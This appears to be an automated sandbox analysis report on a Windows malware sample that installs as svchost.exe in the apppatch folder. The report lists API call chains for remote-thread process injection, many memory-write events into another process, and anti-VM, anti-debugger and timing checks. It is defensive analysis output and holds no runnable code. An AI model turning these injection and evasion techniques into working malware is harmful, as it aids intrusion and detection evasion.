    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_02BD7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB
    Source: svchost.exe, 00000002.00000003.1686150606.0000000002955000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AQEMU
    Source: svchost.exe, 00000002.00000002.2645448105.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfs.DLL
    Source: arxtPs1STE.exe, 00000000.00000002.1402513289.0000000000722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfs
    Source: svchost.exe, 00000002.00000003.1411750098.0000000002912000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2647039093.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2652480302.0000000002923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000002.00000002.2651549889.000000000290D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
    Source: arxtPs1STE.exe, 00000000.00000002.1402513289.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qrogram Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLz
    Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00401B20 rdtsc
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_008E79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02A01360 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02A01360 mov edx, dword ptr fs:[00000030h]
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02A01000 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_00871360 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_00871360 mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_00871000 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_00821360 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_00821360 mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_00821000 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_027C1360 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_027C1360 mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_027C1000 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\apppatch\svchost.exe Memory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 870000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401670
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BD4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02BD4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_008F4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_008F4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_008A4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_008A4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_02BF4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,9_2_02BF4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtUnmapViewOfSection: Direct from: 0x77462D3C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtCreateMutant: Direct from: 0x774635CC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtMapViewOfSection: Direct from: 0x77462D1C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtResumeThread: Direct from: 0x774636AC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtSetInformationProcess: Direct from: 0x77462C5C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtSetInformationThread: Direct from: 0x774563F9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtNotifyChangeKey: Direct from: 0x77463C2C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtSetTimerEx: Direct from: 0x77457B2E
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQueryInformationProcess: Direct from: 0x77462C26
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQuerySystemInformation: Direct from: 0x77462DFC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtClose: Direct from: 0x77462B6C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQuerySystemInformation: Direct from: 0x774648CC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtSetInformationThread: Direct from: 0x77462B4C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQueryAttributesFile: Direct from: 0x77462E6C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtOpenSection: Direct from: 0x77462E0C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtCreateFile: Direct from: 0x77462FEC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtOpenFile: Direct from: 0x77462DCC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtSetInformationThread: Direct from: 0x77462ECC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQueryInformationToken: Direct from: 0x77462CAC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQuerySystemInformation: Direct from: 0x1C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtTerminateThread: Direct from: 0x77462FCC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtAdjustPrivilegesToken: Direct from: 0x77462EAC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtQueryValueKey: Direct from: 0x77462BEC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe NtOpenKeyEx: Direct from: 0x77462B9C
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 820000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 821000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 822000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 875000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2815000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D70000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D71000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D72000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DC5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E10000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E11000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E12000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E65000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2170000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2171000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2172000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 21C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1220000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1221000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1222000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1275000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A25000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1335000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A40000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A41000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A42000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A95000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B1000Jump to behavior
